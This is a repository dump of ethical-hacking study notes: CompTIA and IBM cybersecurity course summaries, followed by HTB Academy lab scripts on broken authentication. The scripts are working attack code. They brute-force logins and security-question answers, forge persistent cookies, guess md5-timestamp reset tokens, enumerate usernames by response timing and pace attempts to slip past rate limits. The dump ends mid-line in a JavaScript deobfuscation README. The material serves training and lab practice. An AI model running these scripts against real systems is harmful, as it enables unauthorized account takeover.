| * Cloud computing features - rapid elasticity, on-demand self-service, resource pooling, measured service (plus broad network access, the fifth NIST essential characteristic). 14 | 15 | * Common cloud services: 16 | 17 | 1. Email applications 18 | 2. Cloud file storage 19 | 3. Virtual application streaming 20 | 4. Application streaming 21 | 5. Cloud-hosted virtual desktops 22 | 23 | ## Client-side Virtualization 24 | 25 | * Hypervisor (VM Manager) - manages the virtual platform and guest OSes; it is also what isolates guests from each other, so it must be kept patched. 26 | 27 | * Virtualization - the guest OS runs on the same CPU architecture as the host, so its instructions execute natively and only hardware access is mediated by the hypervisor. 28 | 29 | * Emulation - one device running processes designed for a completely different architecture; every instruction is translated in software, which is much slower. 
30 | -------------------------------------------------------------------------------- /CompTIA_220-1002/OperationalProcedures/README.md: -------------------------------------------------------------------------------- 1 | # Operational Procedures 2 | 3 | ## Documentation 4 | 5 | * Best practices: 6 | 7 | 1. Network topology diagrams 8 | 2. Knowledge base 9 | 3. Incident response documentation 10 | 4. Compliance 11 | 5. Regulatory 12 | 6. Inventory Management 13 | 14 | ## Disaster Recovery 15 | 16 | * Disaster recovery practices: 17 | 18 | 1. Backup strategies - image level; file level. 19 | 2. Critical application backups 20 | 3. Backup testing and audits 21 | 4. Uninterruptible Power Supply (UPS) 22 | 5. Cloud storage 23 | 6. Account recovery options 24 | 25 | ## Privacy, Licensing and Policies 26 | 27 | * Incident response factors: 28 | 29 | 1. First response 30 | 2. Documentation 31 | 3. Chain of custody 32 | 33 | * Licensing: 34 | 35 | 1. Closed source (Commerical) 36 | 2. Free and Open Source (FOSS) 37 | 3. End User Licensing Agreement (EULA) 38 | 4. Digital Rights Management (DRM) 39 | -------------------------------------------------------------------------------- /CompTIA_220-1002/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA A+ 220-1002 2 | 3 | Notes for the Professor Messer course [CompTIA A+ 220-1002 Training](https://www.professormesser.com/free-a-plus-training/220-1001/220-1000-training-course/). 
4 | 5 | Topics: 6 | 7 | * [Operating Systems](OperatingSystems/README.md) 8 | 9 | * [Security](Security/README.md) 10 | 11 | * [Software Troubleshooting](SoftwareTroubleshooting/README.md) 12 | 13 | * [Operational Procedures](OperationalProcedures/README.md) 14 | -------------------------------------------------------------------------------- /CompTIA_220-1002/Security/README.md: -------------------------------------------------------------------------------- 1 | # Security 2 | 3 | ## Logical Security 4 | 5 | * Logical security concepts: 6 | 7 | 1. Microsoft Active Directory - centralized management; uses Organizational Units. 8 | 2. Mobile Device Management (MDM) - set policies on apps, data, etc. 9 | 3. Port security - limit which MAC addresses may use a given switch port. 10 | 4. Certificate-based authentication 11 | 5. Anti-virus and anti-malware 12 | 6. Firewalls - host-based and network-based. 13 | 7. Directory permissions 14 | 8. VPN concentrator - Encrypt data traversing a public network. 15 | 9. Data Loss Prevention (DLP) 16 | 10. Access Control Lists (ACLs) 17 | 11. Least privilege - permissions set to the bare minimum a user or process needs to do its job. 18 | 19 | ## Malware 20 | 21 | * Common types of malware: 22 | 23 | 1. Ransomware 24 | 2. Crypto-malware 25 | 3. Trojan horse 26 | 4. Spyware 27 | 5. Keyloggers 28 | 6. Rootkits 29 | 7. Virus 30 | 8. Worms 31 | 9. Botnets 32 | 33 | * Anti-malware tools: 34 | 35 | 1. Anti-virus and anti-malware 36 | 2. Windows Recovery Environment 37 | 3. End user education 38 | 4. Firewalls 39 | 5. Secure DNS 40 | 41 | ## Security Threats 42 | 43 | * Social engineering principles: 44 | 45 | 1. Authority 46 | 2. Intimidation 47 | 3. Social proof 48 | 4. Scarcity 49 | 5. Urgency 50 | 6. Familiarity 51 | 7. Trust 52 | 53 | * Social engineering types: 54 | 55 | 1. Phishing 56 | 2. Spear phishing - targeted at a specific person or organization; whaling is spear phishing aimed at executives. 57 | 3. Impersonation 58 | 4. Shoulder surfing 59 | 5. Tailgating 60 | 6. Dumpster diving 61 | 62 | * Denial of service - force a service to fail, either by overloading it or by triggering a design flaw or vulnerability. 
63 | 64 | * DDoS (Distributed Denial of Service) - many compromised computers (a botnet) flood a service at once to bring it down. 65 | 66 | * Mitigating DDoS attacks - filter known attack traffic patterns; anti-DDoS / upstream scrubbing services. 67 | 68 | * Zero-day attacks - exploit a vulnerability that has no patch yet (the vendor may not even know about it), so signature-based defenses usually miss it. 69 | 70 | * Man-in-the-middle attacks - the attacker sits between two parties and relays or alters their traffic, e.g. via ARP poisoning or other traffic redirection. 71 | 72 | * Mitigating MITM attacks - use encrypted and authenticated protocols like HTTPS and SSH, and do not click through certificate or host-key warnings. 73 | 74 | * Brute force attacks - keep trying the login process (slow, and defeated by rate limiting or lockout) or crack stolen hashes offline; dictionary attacks and rainbow tables speed this up, but rainbow tables are defeated by salted hashes. 75 | 76 | * Spoofing - pretend to be something you aren't; MAC spoofing, IP address spoofing. 77 | -------------------------------------------------------------------------------- /CompTIA_220-1002/SoftwareTroubleshooting/README.md: -------------------------------------------------------------------------------- 1 | # Software Troubleshooting 2 | 3 | ## Troubleshooting Windows 4 | 5 | * Slow system performance - check Task Manager; Windows Update; check disk space; laptop may be using power-saving mode; anti-virus scan. 6 | 7 | * Limited connectivity - check IP address config; reboot; ping default gateway. 8 | 9 | * Boot errors - check boot drives; Startup Repair; modify Windows BCD. 10 | 11 | * App crashes - check Event Log; Reliability Monitor; reinstall app. 12 | 13 | * BSOD - reboot system; System Restore; reset hardware; hardware diagnostics. 14 | 15 | * Black screen - start in VGA mode; run SFC (System File Checker); update drivers in Safe Mode; recover from backup. 16 | 17 | * Slow boot - manage startup apps; Task Manager. 18 | 19 | ## Troubleshooting Solutions 20 | 21 | * Common troubleshooting solutions: 22 | 23 | 1. Defragmentation 24 | 2. Reboot 25 | 3. Kill tasks 26 | 4. Restart services 27 | 5. Update network settings 28 | 6. Reload/Restore OS 29 | 7. Update and patch 30 | 8. Repair apps 31 | 9. Disable startup services/apps 32 | 10. 
Safe Mode 33 | 34 | ## Troubleshooting Security Issues 35 | 36 | * Pop-ups - update browser; scan for malware. 37 | 38 | * Browser redirection - scan for malware; anti-malware; restore backup. 39 | 40 | * Browser security alerts - look at certificate details. 41 | 42 | * Malware network symptoms - slow performance; OS update failures; connectivity issues. 43 | 44 | * Malware OS symptoms - renamed system files; files removed; access denied. 45 | 46 | * System lock up - terminate bad apps; check logs; security issues. 47 | 48 | * Email security - spam filters; scan for malware. 49 | 50 | ## Malware Removal 51 | 52 | * Steps to remove malware: 53 | 54 | 1. Identify malware symptoms 55 | 2. Quarantine infected systems 56 | 3. Disable System Restore 57 | 4. Update anti-virus 58 | 5. Scan and remove 59 | 6. Schedule scans and run updates 60 | 7. Enable system protection 61 | 8. Educate end user 62 | -------------------------------------------------------------------------------- /CompTIA_N10-007/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA N10-007 Network+ 2 | 3 | Notes for the Professor Messer course [CompTIA N10-007 Network+](https://www.professormesser.com/network-plus/n10-007/n10-007-training-course/). 4 | 5 | Topics: 6 | 7 | * [Networking Concepts](NetworkingConcepts/README.md) 8 | 9 | * [Infrastructure](Infrastructure/README.md) 10 | 11 | * [Network Operations](NetworkOperations/README.md) 12 | 13 | * [Network Security](NetworkSecurity/README.md) 14 | 15 | * [Network Troubleshooting and Tools](NetworkTroubleshooting/README.md) 16 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/Capstone/README.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Capstone: Breach Response Case Studies 2 | 3 | 1. 
[Incident Management Response and Cyberattack Frameworks](#incident-management-response-and-cyberattack-frameworks) 4 | 2. [Phishing Scams](#phishing-scams) 5 | 3. [Point of Sale Breach](#point-of-sale-breach) 6 | 4. [3rd Party Breach](#3rd-party-breach) 7 | 5. [Ransomware](#ransomware) 8 | 9 | ## Incident Management Response and Cyberattack Frameworks 10 | 11 | * NIST recommendations for IR (Incident Response): 12 | 13 | * Establish formal IR capability 14 | * Create IR policy 15 | * Develop IR plan based on IR policy 16 | * Develop IR procedures 17 | * Establish policies & procedures regarding IR information 18 | * Consider relevant factors when selecting IR team model 19 | 20 | * NIST IR lifecycle: 21 | 22 | * Preparation 23 | * Detection & Analysis 24 | * Containment, Eradication & Recovery 25 | * Post-incident activity 26 | 27 | ## Phishing Scams 28 | 29 | * Types of phishing scams: 30 | 31 | * Phishing 32 | * Spear phishing 33 | * Whaling 34 | 35 | ## Point of Sale Breach 36 | 37 | * For PoS (Point of Sale) Security, the PCI DSS (Payment Card Industry Data Security Standard) is the main payment card industry info security standard; with the goal to protect cardholder data & sensitive authentication data. 
38 | 39 | * Security controls & processes for PCI DSS requirements: 40 | 41 | * Build & maintain secure network & systems 42 | * Protect cardholder data 43 | * Maintain vulnerability management program 44 | * Implement strong access control measures 45 | * Regularly monitor and test networks 46 | * Maintain Information Security policy 47 | 48 | * PoS malware examples: 49 | 50 | * Alina 51 | * vSkimmer 52 | * Dexter 53 | * FYSNA 54 | * Decebel 55 | * BlackPOS 56 | 57 | ## 3rd Party Breach 58 | 59 | * Types of 3rd party breaches 60 | 61 | * Cloud-based 62 | * Payment 63 | * JavaScript library 64 | 65 | ## Ransomware 66 | 67 | * Ransomware - malware that infects computer systems, restricting user access; users are told that unless a ransom is paid, access will not be restored. 68 | 69 | * Types of ransomware: 70 | 71 | * Crypto 72 | * Locker 73 | * Leakware/Doxware 74 | 75 | * Ransomware attack vectors: 76 | 77 | * Phishing 78 | * RDP (Remote Desktop Protocol) 79 | * Software vulnerabilities 80 | * Malicious links 81 | 82 | * Prevention: 83 | 84 | * Backup 85 | * Update software & passwords 86 | * Antivirus 87 | * Beware of links 88 | 89 | * Ransomware examples: 90 | 91 | * Locky 92 | * WannaCry 93 | * Bad Rabbit 94 | * Ryuk 95 | * Troldesh 96 | * Jigsaw 97 | * CryptoLocker 98 | * Petya 99 | * GoldenEye 100 | * GandCrab 101 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/Pentesting/README.md: -------------------------------------------------------------------------------- 1 | # Penetration Testing, Incident Response and Forensics 2 | 3 | 1. [Penetration Testing](#penetration-testing) 4 | 2. [Incident Response](#incident-response) 5 | 3. [Digital Forensics](#digital-forensics) 6 | 4. 
[Introduction to Scripting](#introduction-to-scripting) 7 | 8 | ## Penetration Testing 9 | 10 | * Approaches to pentesting: 11 | 12 | * Internal, external 13 | * Web, mobile app assessments 14 | * Social engineering 15 | * Wireless networks, embedded devices, IoT 16 | * ICS (Industrial Control Systems) pentesting 17 | 18 | * Phases (as in NIST SP 800-115): 19 | 20 | * Planning 21 | * Discovery 22 | * Attack 23 | * Report 24 | 25 | ## Incident Response 26 | 27 | * Incident response - detecting and handling incidents so as to minimize loss, stop the exploit from spreading and restore services. 28 | 29 | * IR team models: 30 | 31 | * Central 32 | * Distributed 33 | * Coordinating 34 | 35 | * IR phases: 36 | 37 | * Preparation 38 | * Detection & Analysis 39 | * Containment, Eradication & Recovery 40 | * Post-incident activity 41 | 42 | ## Digital Forensics 43 | 44 | * Digital forensics - identification, collection, examination & analysis of data while preserving its integrity and maintaining a chain of custody (so the evidence remains admissible). 45 | 46 | * Forensic process 47 | 48 | * Collection 49 | * Examination 50 | * Analysis 51 | * Reporting 52 | 53 | ## Introduction to Scripting 54 | 55 | * Scripts - small interpreted programs for purposes such as automation, testing, etc. 56 | 57 | * Common scripting languages include JavaScript, Bash, Perl and PowerShell; binary and hex are number encodings you will meet when reading their output, not languages. 58 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/README.md: -------------------------------------------------------------------------------- 1 | # IBM Cybersecurity Analyst Professional Certificate 2 | 3 | * Notes for the Coursera certificate [IBM Cybersecurity Analyst Professional Certificate](https://www.coursera.org/professional-certificates/ibm-cybersecurity-analyst), consisting of 8 courses: 4 | 5 | 1. [Introduction to Cybersecurity Tools & Cyber Attacks](IntroCyberToolsAttacks/README.md) 6 | 7 | 2. [Cybersecurity Roles, Processes & Operating System Security](CyberRolesProcesses/README.md) 8 | 9 | 3. 
[Cybersecurity Compliance Framework & System Administration](CyberCompliance/README.md) 10 | 11 | 4. [Network Security & Database Vulnerabilities](NetworkSecurity/README.md) 12 | 13 | 5. [Penetration Testing, Incident Response and Forensics](Pentesting/README.md) 14 | 15 | 6. [Cyber Threat Intelligence](CyberThreatIntel/README.md) 16 | 17 | 7. [Cybersecurity Capstone: Breach Response Case Studies](Capstone/README.md) 18 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/basic_bruteforce.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # define target url, change as needed 6 | url = "http://brokenauthentication.hackthebox.eu/login.php" 7 | 8 | # define a fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # define the string expected if valid account has been found. 
our basic PHP example replies with Welcome in case of success (a plain substring match, so pick a string that only appears after a successful login) 12 | 13 | valid = "Welcome" 14 | 15 | """ 16 | wordlist is expected as CSV with field like: Vendor,User,Password,Comment 17 | for this test we are using SecLists' Passwords/Default-Credentials/default-passwords.csv 18 | change this function if your wordlist has a different format 19 | """ 20 | def unpack(fline): 21 | # get user: second column of the Vendor,User,Password,Comment CSV 22 | userid = fline.split(",")[1] 23 | 24 | # NOTE(review): a password containing a comma is truncated here (only the third field is kept); parse with the csv module if the wordlist has quoted fields 25 | passwd = fline.split(",")[2] 26 | 27 | return userid, passwd 28 | 29 | """ 30 | our PHP example accepts requests via POST, and requires parameters as userid and passwd 31 | """ 32 | def do_req(url, userid, passwd, headers): 33 | data = {"userid": userid, "passwd": passwd, "submit": "submit"} 34 | res = requests.post(url, headers=headers, data=data) 35 | 36 | return res.text 37 | 38 | """ 39 | if defined valid string is found in response body return True 40 | """ 41 | def check(haystack, needle): 42 | if needle in haystack: 43 | return True 44 | else: 45 | return False 46 | 47 | def main(): 48 | # check that the script was run with an argument and that the argument is an existing file 49 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 50 | fname = sys.argv[1] 51 | else: 52 | print("[!] 
Please check wordlist.") 53 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 54 | sys.exit() 55 | 56 | # open the file, this is our wordlist 57 | with open(fname) as fh: 58 | # read file line by line 59 | for fline in fh: 60 | # skip line if it starts with a comment 61 | if fline.startswith("#"): 62 | continue 63 | # use unpack() function to extract userid and password from wordlist, removing trailing newline 64 | userid, passwd = unpack(fline.rstrip()) 65 | 66 | # call do_req() to do the HTTP request 67 | print("[-] Checking account {} {}".format(userid, passwd)) 68 | res = do_req(url, userid, passwd, headers) 69 | 70 | # call function check() to verify if HTTP response text matches our content 71 | if (check(res, valid)): 72 | print("[+] Valid account found: userid:{} passwd:{}".format(userid, passwd)) 73 | 74 | if __name__ == "__main__": 75 | main() 76 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/cookie_tampering.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from binascii import hexlify 3 | import codecs 4 | import requests 5 | from sys import exit 6 | 7 | # create url using user and password as argument 8 | url = "http://127.0.0.1/profile.php" 9 | 10 | # assume cookie is set as 11 | # PERSISTENT=6e554576714b41797077636a4d4b576d6e4b41304d4a35304c3239696e3279794277526d5a777433 12 | # and decoded gives htbuser:persistentcookie:13287 13 | 14 | # bruteforce the 5digit scope 15 | for x in range(100000): 16 | 17 | # force the string to be 5 chars, even if it is smaller than 10000 18 | x = str(x).zfill(5) 19 | 20 | print ("[+] Testing {}\r".format(x)) 21 | plaintext_cookie = "htbadmin:persistentcookie:{}".format(x) 22 | 23 | # step 1: to Base64 24 | x_step1 = b64encode(plaintext_cookie.encode()).decode() 25 | #print(x_step1) 26 | 27 | # step 2: rot13 28 | x_step2 = codecs.encode(x_step1, 
"rot-13").encode() 29 | #print(x_step2) 30 | 31 | # step 3: to hex 32 | encoded_cookie = hexlify(x_step2) 33 | #print(encoded_cookie) 34 | 35 | # set cookie, decoding because wants a string 36 | cookie = { "PERSISTENT": encoded_cookie.decode() } 37 | 38 | # do the request 39 | res = requests.get(url, cookies=cookie) 40 | 41 | # handle Welcome message, that should tell us we found a valid cookie 42 | if 'Welcome ' in res.text: 43 | print("[+] Valid cookie found: {}".format(encoded_cookie)) 44 | # we don't need more check 45 | exit() 46 | # if we are prompted a login page, we probably don't have a valid cookie 47 | elif 'Login ' in res.text: 48 | continue 49 | # we should never be here, notify in case 50 | else: 51 | print("[-] Unexpected reply, please manually check cookie {}".format(encoded_cookie)) 52 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/final_skill_assessment_bruteforce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | 4 | # file that contain user:pass 5 | userpass_file = "valid_passwords.txt" 6 | 7 | # create url using user and password as argument 8 | url = "http://83.136.254.223:57399/login.php" 9 | 10 | # rate limit blocks for 30 seconds 11 | lock_time = 30 12 | 13 | # define limit after which we get hit with too many attempts message 14 | attempts_limit = 5 15 | 16 | # message that alert us we hit rate limit 17 | lock_message = "Too many" 18 | 19 | # define number of attempts 20 | number_of_attempts = 0 21 | 22 | # read user and password 23 | with open(userpass_file, "r") as fh: 24 | for fline in fh: 25 | 26 | # if we have reached limit of attempts at a time, wait on own 27 | if (number_of_attempts != 0) and (number_of_attempts % 5 == 0): 28 | print("[-] Hit rate limit, sleeping 30") 29 | time.sleep(lock_time+0.5) 30 | 31 | # skip comment 32 | if fline.startswith("#"): 33 | continue 34 | 35 | # take 
username 36 | username = fline.split(":")[0] 37 | 38 | # take password: re-join the remaining fields so a password containing ':' survives, then strip the trailing newline 39 | password = ":".join(fline.split(":")[1:]).replace('\n', '') 40 | 41 | # prepare POST data (field names must match the login form: userid, passwd, submit) 42 | data = { 43 | "userid": username, 44 | "passwd": password, 45 | "submit": "submit" 46 | } 47 | 48 | # do the request 49 | res = requests.post(url, data=data) 50 | # print(res.text) 51 | 52 | number_of_attempts += 1 53 | 54 | # classify the reply by substring match: invalid credentials, success, or rate limit. NOTE(review): a reply matching none of these is silently ignored, so that credential pair would be dropped without notice 55 | if "Invalid credentials" in res.text: 56 | print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password)) 57 | elif "Welcome back" in res.text: 58 | print("[+] Valid credentials: userid:{} passwd:{}".format(username, password)) 59 | # hit rate limit: wait lock_time before continuing. NOTE(review): the pre-emptive sleep at the top of the loop tests number_of_attempts % 5 instead of attempts_limit, so keep the two in sync; also the pair that triggered the lock is not retried 60 | elif lock_message in res.text: 61 | print("[-] Hit rate limit, sleeping 30") 62 | # sleep slightly longer than the lock window to absorb clock differences with the server 63 | time.sleep(lock_time+0.5) 64 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/passwd_policy_req.txt: -------------------------------------------------------------------------------- 1 | qwerty 2 | Qwerty 3 | Qwerty1 4 | Qwertyu1 5 | Qwert1! 6 | Qwerty1! 7 | QWERTY1 8 | QWERT1! 9 | QWERTY1! 10 | Qwerty! 
11 | Qwertyuiop12345!@#$% -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/predictable_questions.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # target url, change as needed 6 | url = "http://brokenauthentication.hackthebox.eu/predictable_questions.php" 7 | 8 | # fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # string expected if the answer is wrong 12 | invalid = "Sorry, wrong answer" 13 | 14 | # question to bruteforce 15 | question = "Do you prefer pizza or pasta?" 16 | 17 | 18 | # wordlist is expected as one word per line, function kept to let you to parse different wordlist format keeping the code clean 19 | def unpack(fline): 20 | answer = fline 21 | 22 | return answer 23 | 24 | # do the web request, change data as needed 25 | def do_req(url, answer, headers): 26 | # closely inspect POST data sent using any intercepting proxy to create a valid data 27 | data = {"answer": answer, "question": question, "userid": "htbadmin", "submit": "answer"} 28 | res = requests.post(url, headers=headers, data=data) 29 | 30 | return res.text 31 | 32 | # pretending we just know the message received when the answer is wrong, we flip the check 33 | def check(haystack, needle): 34 | # if our invalid string is found in response body return False 35 | if needle in haystack: 36 | return False 37 | else: 38 | return True 39 | 40 | def main(): 41 | # check if wordlist has been given and exists 42 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 43 | fname = sys.argv[1] 44 | else: 45 | print("[!] 
Please check wordlist.") 46 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 47 | sys.exit() 48 | 49 | # open the file 50 | with open(fname) as fh: 51 | for fline in fh: 52 | # skip line if starts with a comment 53 | if fline.startswith("#"): 54 | continue 55 | # extract userid and password from wordlist, removing trailing newline 56 | answer = unpack(fline.rstrip()) 57 | 58 | # do HTTP request 59 | print("[-] Checking word {}".format(answer)) 60 | res = do_req(url, answer, headers) 61 | 62 | # check if response text matches our content 63 | #print(res) 64 | if (check(res, invalid)): 65 | print("[+] Valid answer found: {}".format(answer)) 66 | sys.exit() 67 | 68 | if __name__ == "__main__": 69 | main() 70 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/rate_limit_check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | 4 | # file that contain user:pass 5 | userpass_file = "userpass.txt" 6 | 7 | # create url using user and password as argument 8 | url = "http://127.0.0.1/login.php" 9 | 10 | # rate limit blocks for 30 seconds 11 | lock_time = 30 12 | 13 | # message that alert us we hit rate limit 14 | lock_message = "Too many failures" 15 | 16 | # read user and password 17 | with open(userpass_file, "r") as fh: 18 | for fline in fh: 19 | # skip comment 20 | if fline.startswith("#"): 21 | continue 22 | 23 | # take username 24 | username = fline.split(":")[0] 25 | 26 | # take password, join to keep password that contain a : 27 | password = ":".join(fline.split(":")[1:]).replace('\n', '') 28 | 29 | # prepare POST data 30 | data = { 31 | "user": username, 32 | "pass": password 33 | } 34 | 35 | # do the request 36 | res = requests.post(url, data=data) 37 | 38 | # handle generic credential error 39 | if "Invalid credentials" in res.text: 40 | print("[-] Invalid credentials: userid:{} passwd:{}".format(username, 
password)) 41 | # user and password were valid! 42 | elif "Access granted" in res.text: 43 | print("[+] Valid credentials: userid:{} passwd:{}".format(username, password)) 44 | # hit rate limit: wait lock_time, then move on (the pair that triggered the lock is not retried) 45 | elif lock_message in res.text: 46 | print("[-] Hit rate limit, sleeping 30") 47 | # sleep slightly longer than the lock window to absorb clock differences with the server 48 | time.sleep(lock_time+0.5) 49 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/reset_token_time.py: -------------------------------------------------------------------------------- 1 | from hashlib import md5 2 | import requests 3 | from sys import exit 4 | from time import time 5 | 6 | url = "http://127.0.0.1/reset_token_time.php" 7 | 8 | # the target is assumed to build the reset token as md5(unix timestamp), which makes it guessable; try every second from 120 seconds ago up to now to cover clock skew and the delay since the reset was requested. NOTE(review): now is sampled once, so the reset must have been requested before this script starts 9 | now = int(time()) 10 | start_time = now - 120 11 | fail_text = "Wrong token" 12 | 13 | # loop from start_time to now inclusive (range() excludes its upper bound, hence the + 1) 14 | for x in range(start_time, now + 1): 15 | # candidate token: md5 of the timestamp as a decimal string, hex-encoded 16 | md5_token = md5(str(x).encode()).hexdigest() 17 | data = { 18 | "submit": "check", 19 | "token": md5_token 20 | } 21 | 22 | print("checking {} {}".format(str(x), md5_token)) 23 | 24 | # send the request 25 | res = requests.post(url, data=data) 26 | 27 | # anything other than the failure message counts as a hit; the raw reply is printed for manual inspection 28 | if not fail_text in res.text: 29 | print(res.text) 30 | print("[*] Congratulations! 
raw reply printed before") 31 | exit() 32 | 33 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/timing.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # define target url, change as needed. This script enumerates usernames through response timing: if the login takes noticeably longer for some userids (typically because the password is only hashed/compared for accounts that exist), those accounts are revealed regardless of the password sent 6 | url = "http://brokenauthentication.hackthebox.eu/login.php" 7 | 8 | # define a fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success (not used by this script, which only records timings; kept for parity with basic_bruteforce.py) 12 | 13 | valid = "Welcome" 14 | 15 | """ 16 | wordlist is expected as simple list, we keep this function to have it ready if needed. 17 | for this test we are using /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt 18 | change this function if your wordlist has a different format 19 | """ 20 | def unpack(fline): 21 | userid = fline 22 | passwd = 'foobar' 23 | 24 | return userid, passwd 25 | 26 | """ 27 | our PHP example accepts requests via POST, and requires parameters as userid and passwd 28 | """ 29 | def do_req(url, userid, passwd, headers): 30 | data = {"userid": userid, "passwd": passwd, "submit": "submit"} 31 | res = requests.post(url, headers=headers, data=data) 32 | print("[+] user {:15} took {}".format(userid, res.elapsed.total_seconds())) 33 | 34 | return res.text 35 | 36 | def main(): 37 | # check that the script was run with an argument and that the argument is an existing file 38 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 39 | fname = sys.argv[1] 40 | else: 41 | print("[!] 
Please check wordlist.") 42 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 43 | sys.exit() 44 | 45 | # open the file, this is our wordlist 46 | with open(fname) as fh: 47 | # read file line by line 48 | for fline in fh: 49 | # skip line if it starts with a comment 50 | if fline.startswith("#"): 51 | continue 52 | # use unpack() function to extract userid and password from wordlist, removing trailing newline 53 | userid, passwd = unpack(fline.rstrip()) 54 | 55 | # call do_req() to do the HTTP request 56 | print("[-] Checking account {} {}".format(userid, passwd)) 57 | res = do_req(url, userid, passwd, headers) 58 | 59 | if __name__ == "__main__": 60 | main() 61 | 62 | -------------------------------------------------------------------------------- /HTBAcademy/Footprinting/enum-method3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/HTBAcademy/Footprinting/enum-method3.png -------------------------------------------------------------------------------- /HTBAcademy/JSDeobfuscation/README.md: -------------------------------------------------------------------------------- 1 | # Javascript Deobfuscation 2 | 3 | 1. [Obfuscation](#obfuscation) 4 | 1. [Deobfuscation](#deobfuscation) 5 | 6 | ## Obfuscation 7 | 8 | * We can view the source code of a webpage using Developer Tools (Ctrl+U to view page source); JS can be written internally between ```